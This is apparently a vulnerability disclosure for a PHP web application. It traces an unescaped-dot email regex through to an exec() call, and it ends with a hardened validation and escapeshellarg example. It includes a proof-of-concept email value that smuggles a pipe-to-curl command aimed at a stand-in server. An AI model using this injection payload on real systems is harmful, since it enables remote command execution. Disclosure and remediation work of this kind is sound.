List of vulnerable paths
Vulnerable path /application/controllers/api/user.php
Vulnerable path /application/libraries/service/Network/Request.php
The process of code audit
The $email comes from Request::parse().
Lines 44-56 of "Request.php" show us that we can input any data.
Lines 294-295 of "user.php" use a vulnerable regular expression: because there is no backslash in front of the dot, the dot can match anything.
Then the email is passed into EmailSender::send().
Let us check the function.
We can exploit the function "exec" to achieve remote code execution.
Vulnerability exploitation process:
Register and log in.
Input the POC.
We can check 'result.txt' and decode it.
POC code:
youyou@qq.com'xx|curl test.server.com;xx'xx
Your exp should be on test.server.com. We can execute any remote command.
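The validate-then-exec flow described above, with the checks that close it, as an added PHP example that is not the project's code. The weak pattern, the helper path and all function names are assumptions, since the report does not reproduce the original regular expression or the exec call.

```php
<?php
// Added illustration; every name, pattern and path here is hypothetical.

// Assumed shape of the weak check: unescaped dot and no end anchor, so a
// valid-looking prefix is enough and anything may follow it.
const WEAK_EMAIL_RE = '/^\w+@\w+.\w+/';

// Strict allow-list: anchored at both ends, literal dots, and no quote,
// pipe, semicolon or whitespace anywhere in the value.
const STRICT_EMAIL_RE =
    '/\A[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/';

function isWeaklyValid(string $email): bool
{
    return preg_match(WEAK_EMAIL_RE, $email) === 1;
}

function isStrictlyValid(string $email): bool
{
    return strlen($email) <= 254 && preg_match(STRICT_EMAIL_RE, $email) === 1;
}

// Builds the command line for a hypothetical mail helper. Validation and
// shell quoting are separate controls; both are applied before any exec().
function buildSendCommand(string $email): string
{
    if (!isStrictlyValid($email)) {
        throw new InvalidArgumentException('invalid email address');
    }
    return '/usr/local/bin/send-mail --to ' . escapeshellarg($email);
}

// Inputs: the string from the report above and two constructed addresses.
$samples = [
    "youyou@qq.com'xx|curl test.server.com;xx'xx",
    'youyou@qqXcom',   // accepted by the weak pattern only because "." is unescaped
    'youyou@qq.com',
];
foreach ($samples as $email) {
    printf("weak=%s strict=%s %s\n",
        var_export(isWeaklyValid($email), true),
        var_export(isStrictlyValid($email), true),
        $email);
}
echo buildSendCommand('youyou@qq.com'), "\n";
```

Where the mail helper can be invoked without a shell at all, passing the arguments as an array to proc_open() (PHP 7.4 and later) removes the quoting step entirely.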